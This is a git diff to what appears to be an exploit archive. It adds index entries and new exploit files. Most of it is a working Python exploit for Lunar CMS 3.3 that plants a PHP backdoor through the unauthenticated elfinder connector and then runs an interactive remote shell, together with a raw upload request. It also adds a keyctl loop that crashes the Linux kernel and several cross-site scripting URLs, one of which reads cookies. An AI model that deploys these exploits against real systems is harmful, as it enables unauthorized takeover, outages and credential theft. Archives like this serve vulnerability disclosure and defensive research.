diff --git a/files.csv b/files.csv index f5dc3ef6c..a82288234 100755 --- a/files.csv +++ b/files.csv @@ -16525,7 +16525,7 @@ id,file,description,date,author,platform,type,port 19168,platforms/unix/local/19168.sh,"SGI IRIX <= 6.5.4,Solaris <= 2.5.1 ps(1) Buffer Overflow Vulnerability",1997-04-28,"Joe Zbiciak",unix,local,0 19172,platforms/unix/local/19172.c,"BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (1)",1997-04-26,cesaro,unix,local,0 19173,platforms/unix/local/19173.c,"BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (2)",1997-04-26,BeastMaster,unix,local,0 -19174,platforms/php/webapps/19174.py,"Useresponse <= 1.0.2 Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0 +19174,platforms/php/webapps/19174.py,"Useresponse <= 1.0.2 - Privilege Escalation & RCE Exploit",2012-06-15,mr_me,php,webapps,0 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer (m3u/ppl File) Buffer Overflow",2012-06-15,metasploit,windows,local,0 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) Vulnerability",2012-06-15,metasploit,windows,remote,0 @@ -30504,6 +30504,7 @@ id,file,description,date,author,platform,type,port 33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80 33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007 33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0 +33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0 33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0 33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0 33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 Multiple Input Validation Vulnerabilities",2010-04-08,"cp77fk4r ",multiple,remote,0 @@ -30515,3 +30516,9 @@ id,file,description,date,author,platform,type,port 33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET <= 12.0 remote SYSTEM exploit",2007-09-25,mu-b,multiple,remote,0 33879,platforms/multiple/dos/33879.c,"NovaSTOR NovaNET/NovaBACKUP <= 13.0 remote DoS",2007-10-02,mu-b,multiple,dos,0 33880,platforms/windows/remote/33880.rb,"Cogent DataHub Command Injection",2014-06-25,metasploit,windows,remote,0 +33881,platforms/php/webapps/33881.txt,"PowerEasy 2006 'ComeUrl' Parameter Cross Site Scripting Vulnerability",2010-04-24,Liscker,php,webapps,0 +33882,platforms/php/webapps/33882.txt,"Cyber CMS 'faq.php' SQL Injection Vulnerability",2009-11-26,hc0de,php,webapps,0 +33883,platforms/php/webapps/33883.txt,"Kasseler CMS 2.0.5 'index.php' Cross Site Scripting Vulnerability",2010-04-26,indoushka,php,webapps,0 +33884,platforms/php/webapps/33884.txt,"Zikula Application Framework 1.2.2 ZLanguage.php lang Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0 +33885,platforms/php/webapps/33885.txt,"Zikula Application Framework 1.2.2 index.php func Parameter XSS",2010-04-13,"High-Tech Bridge SA",php,webapps,0 +33886,platforms/linux/dos/33886.txt,"Linux Kernel 'find_keyring_by_name()' Local Memory Corruption Vulnerability",2010-04-27,"Toshiyuki Okajima",linux,dos,0 diff --git a/platforms/linux/dos/33886.txt b/platforms/linux/dos/33886.txt new file mode 100755 index 000000000..659131f34 --- /dev/null +++ b/platforms/linux/dos/33886.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/39719/info + +The Linux kernel is prone to a local memory-corruption vulnerability. + +Attackers can exploit this issue to crash the affected computer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. + +kernel 2.6.34-rc5 is vulnerable. + +The following proof-of-concept is available: + +for ((i=0; i<100000; i++)); do keyctl session wibble /bin/true || break; done \ No newline at end of file diff --git a/platforms/php/webapps/33867.txt b/platforms/php/webapps/33867.txt new file mode 100755 index 000000000..fcde3c0da --- /dev/null +++ b/platforms/php/webapps/33867.txt @@ -0,0 +1,119 @@ +?#!/usr/bin/env python +# +# +# Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit +# +# +# Vendor: Lunar CMS +# Product web page: http://www.lunarcms.com +# Affected version: 3.3 +# +# Summary: Lunar CMS is a freely distributable open source content +# management system written for use on servers running the ever so +# popular PHP5 & MySQL. +# +# Desc: Lunar CMS suffers from an unauthenticated arbitrary command +# execution vulnerability. The issue is caused due to the improper +# verification of elfinder's upload/create/rename function in the file +# manager. This can be exploited to execute arbitrary PHP code by creating +# or uploading a malicious PHP script file that will be stored in '/files' +# directory. +# +# Tested on: Apache/2.4.7 (Win32) +# PHP/5.5.6 +# MySQL 5.6.14 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2014-5189 +# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5189.php +# +# Vendor fix: http://lunarcms.com/Get.html +# +# +# 11.06.2014 +# + + +import cookielib, urllib +import urllib2, sys, os + +piton = os.path.basename(sys.argv[0]) + +if len(sys.argv) < 4: + print '\n\x20\x20[*] Usage: '+piton+' \n' + print '\x20\x20[*] Example: '+piton+' zeroscience.mk lunarcms backdoor.php\n' + sys.exit() + +host = sys.argv[1] +path = sys.argv[2] +fname = sys.argv[3] + +cj = cookielib.CookieJar() +opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) + +create = opener.open('http://'+host+'/'+path+'/admin/includes/elfinder/php/connector.php?cmd=mkfile&name='+fname+'&target=l1_XA') +#print create.read() + +payload = urllib.urlencode({ + 'cmd' : 'put', + 'target' : 'l1_'+fname.encode('base64','strict'), + 'content' : '' + }) + +write = opener.open('http://'+host+'/'+path+'/admin/includes/elfinder/php/connector.php', payload) +#print write.read() +print '\n' +while True: + try: + cmd = raw_input('shell@'+host+':~# ') + + execute = opener.open('http://'+host+'/'+path+'/files/'+fname+'?cmd='+urllib.quote(cmd)) + reverse = execute.read() + print reverse; + + if cmd.strip() == 'exit': + break + + except Exception: + break + +sys.exit() + + +# +# Using the upload vector: +# +# POST /lc/admin/includes/elfinder/php/connector.php HTTP/1.1 +# Host: localhost +# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0 +# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +# Accept-Language: en-US,en;q=0.5 +# Accept-Encoding: gzip, deflate +# Referer: http://localhost/lc/admin/file_manager.php +# Content-Length: 443 +# Content-Type: multipart/form-data; boundary=---------------------------156802976525302 +# Cookie: PHPSESSID=n37tnhsdfs1sgolum477jgqg33 +# Connection: keep-alive +# Pragma: no-cache +# Cache-Control: no-cache +# +# -----------------------------156802976525302 +# Content-Disposition: form-data; name="cmd" +# +# upload +# -----------------------------156802976525302 +# Content-Disposition: form-data; name="target" +# +# l1_XA +# -----------------------------156802976525302 +# Content-Disposition: form-data; name="upload[]"; filename="shell.php" +# Content-Type: application/octet-stream +# +# +# -----------------------------156802976525302-- +# +# diff --git a/platforms/php/webapps/33881.txt b/platforms/php/webapps/33881.txt new file mode 100755 index 000000000..48d125b3d --- /dev/null +++ b/platforms/php/webapps/33881.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39696/info + +PowerEasy is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +PowerEasy 2006 is vulnerable; other versions may also be affected. + +http://www.example.com:80/user/User_ChkLogin.asp?ComeUrl=" style="XSS:expression(alert(/liscker/))" \ No newline at end of file diff --git a/platforms/php/webapps/33882.txt b/platforms/php/webapps/33882.txt new file mode 100755 index 000000000..155dacdc2 --- /dev/null +++ b/platforms/php/webapps/33882.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/39698/info + +Cyber CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/faq.php?id=SQL_CODE \ No newline at end of file diff --git a/platforms/php/webapps/33883.txt b/platforms/php/webapps/33883.txt new file mode 100755 index 000000000..66997da7a --- /dev/null +++ b/platforms/php/webapps/33883.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39703/info + +Kasseler CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +This issue affects Kasseler CMS 2.0.5; other versions may also be affected. + +http://www.example.com/index.php?online/<script>alert(213771818860)</script> \ No newline at end of file diff --git a/platforms/php/webapps/33884.txt b/platforms/php/webapps/33884.txt new file mode 100755 index 000000000..d88ed29c8 --- /dev/null +++ b/platforms/php/webapps/33884.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39717/info + +Zikula Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Zikula Application Framework 1.2.2 is vulnerable; other versions may also be affected. + +http://www.example.com/?lang=en%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E \ No newline at end of file diff --git a/platforms/php/webapps/33885.txt b/platforms/php/webapps/33885.txt new file mode 100755 index 000000000..b0fe0f965 --- /dev/null +++ b/platforms/php/webapps/33885.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/39717/info + +Zikula Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Zikula Application Framework 1.2.2 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?module=adminpanel&type=admin&func=adminpanel&lang=en%27%22%3E%3Cimg%20src=0%20onerror=alert%28document.cookie%29%3E \ No newline at end of file